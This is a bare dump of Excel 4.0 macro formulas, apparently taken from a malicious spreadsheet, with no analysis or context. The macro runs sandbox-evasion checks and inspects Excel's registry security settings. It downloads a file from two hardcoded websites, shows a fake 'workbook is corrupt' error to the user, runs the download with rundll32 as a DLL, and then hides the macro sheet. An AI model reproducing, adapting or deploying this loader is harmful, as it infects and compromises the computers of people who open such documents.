=APP.MAXIMIZE() =IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<390,CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,CLOSE(TRUE)) ="C:\Users\Public\"&RANDBETWEEN(1,9999)&".reg" ="EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security "&R[-1]C&" /y" =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",R[-1]C,0,5) =WAIT(NOW()+"00:00:03") =FOPEN(R[-4]C) =FPOS(R[-1]C,215) =FREAD(R[-2]C,255) =FCLOSE(R[-3]C) =FILE.DELETE(R[-8]C) =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),) ="C:\Users\Public\CVR"&RANDBETWEEN(1000,9999)&".tmp.cvr" ="http://caude368.com/wp-content/themes/calliope/wp_data.php" ="http://caudebachthu.com/wp-content/themes/calliope/wp_data.php" =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-2]C,R[-3]C,0,0) =ERROR(FALSE) =FOPEN(R[-5]C,2) =IF(ISERROR(R[-1]C),,GOTO(R[2]C)) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,R[-5]C,R[-7]C,0,0) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe",R[-9]C&",DllRegisterServer",0,5) =CLOSE(FALSE) =WORKBOOK.HIDE("9F9KHTWmWg",TRUE) =GOTO(C1)